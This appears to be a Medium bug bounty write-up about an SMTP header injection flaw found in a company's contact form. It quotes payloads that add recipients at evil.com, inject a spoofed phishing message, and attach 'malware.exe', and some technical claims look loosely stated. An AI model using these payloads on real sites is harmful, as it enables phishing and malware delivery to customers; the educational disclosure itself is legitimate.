Open in app

Sign in

Write

Sign in

How I Found an SMTP Injection Bug & Earned $800 in Just 30 Minutes!

TheIndianNetwork
3 min readApr 2, 2025

--

Images By- TheIndianNetwork

Bug bounty hunting is full of surprises, and sometimes, the easiest vulnerabilities can pay the most. This is the story of how I stumbled upon an SMTP Injection bug, reported it, and earned $800 in just half an hour. I’ll also share the exact techniques, tools, and payloads I used so you can try it yourself!

The Target: A Well-Known Company with a Contact Form

Like any other day, I was reconnaissance scanning for potential targets. I found a large e-commerce website that had an email-based contact form.

Here’s what I noticed:

  • The contact form had fields for Name, Email, Subject, and Message.
  • It sent an automated confirmation email once submitted.
  • The email address I entered was reflected in the email body.

Immediately, my hacker instincts kicked in — what if the input was vulnerable to SMTP Injection?

Step 1: Advanced Reconnaissance Techniques

To maximize my chances of finding vulnerabilities, I used the following reconnaissance techniques:

1. Searching for Email-Based Forms

I used Google Dorking to find email-based contact forms:

inurl:/contact.php OR inurl:/feedback.php "email" site:target.com

2. Checking for Email Reflection in Responses

Using Burp Suite, I intercepted the request and tested whether the email field was reflected in the response:

GET /contact?email=test@example.com HTTP/1.1
Host: target.com

If the email appeared in the response, it meant potential SMTP Injection or Email Spoofing.

Step 2: Testing for SMTP Injection

I submitted a normal test message to see what the email looked like. Then, I injected an SMTP payload into the email field:

victim@example.com
RCPT TO: attacker@evil.com

A few seconds later, I received two emails — one at my original email and another at my attacker-controlled email.

💡 Bingo! The server was accepting additional SMTP commands!

Step 3: Exploiting for Maximum Impact

To check the severity, I tried a more advanced payload to manipulate the email structure and send messages on behalf of the company:

"attacker@example.com\nBCC: masslist@spam.com\nSubject: URGENT Security Alert!\nBody: Your account has been compromised. Click here to secure it: https://evil.com"

This spoofed an email that appeared to come directly from the company. If an attacker abused this, they could send phishing emails to thousands of customers!

Advanced Exploitation: Sending Malicious Attachments

I wanted to see if I could inject attachments into emails to increase the impact.

From: "support@target.com"\n
To: victim@example.com\n
Subject: Urgent Action Required\n
Content-Type: multipart/mixed; boundary="XYZ"
--XYZ
Content-Type: text/plainYour account is compromised! Click below to verify:https://evil.com--XYZ
Content-Type: application/octet-stream; name="malware.exe"
Content-Disposition: attachment; filename="malware.exe"[malicious binary content]--XYZ--

This payload would attach a malware file to the email, making it a high-critical vulnerability.

Step 4: Reporting the Bug & Getting Paid

I quickly drafted a professional report and submitted it to their bug bounty program on HackerOne.

Bug Report Summary

  • Vulnerability: SMTP Injection in Contact Form
  • Impact: Allows email spoofing, phishing, unauthorized email sending, and malware injection
  • Steps to Reproduce: Provided multiple payloads and email logs
  • Proof of Concept Video: Attached a screen recording showing real-time exploitation

Within 30 minutes, I got a response from their security team:

🚀 “We have verified the issue and marked it as HIGH severity. Expect a payout soon.”

A day later, I received $800 in my HackerOne account! 🎉

Lessons Learned & Takeaways

  1. Always check email-based forms — They are often vulnerable to SMTP Injection.
  2. Try multiple payloads — Even if a basic test fails, an advanced payload might work.
  3. Increase impact — Companies pay more for vulnerabilities that pose real-world threats.
  4. Bug bounty is about creativity — Sometimes, simple bugs turn into big rewards.
  5. SMTP Injection can escalate — By injecting attachments, you can turn a medium bug into a critical one.

Want More Bug Bounty Success Stories?

📖 Medium Blog: TheIndianNetwork
📺 YouTube Channel: TheIndianNetwork
📧 Email: theindiannetwork@protonmail.com

💰 Go hunt, find a bug, and make money today!

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Smtp Injection
Smtp
Email Spoofing
Bug Bounty
Bug Bounty Tips

--

--

TheIndianNetwork
TheIndianNetwork

Written by TheIndianNetwork

378 Followers
1 Following

The Indian Network is a dedicated platform focused on educating and empowering individuals in the fields of cybersecurity, ethical hacking, and digital privacy.

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Rules

Terms

Text to speech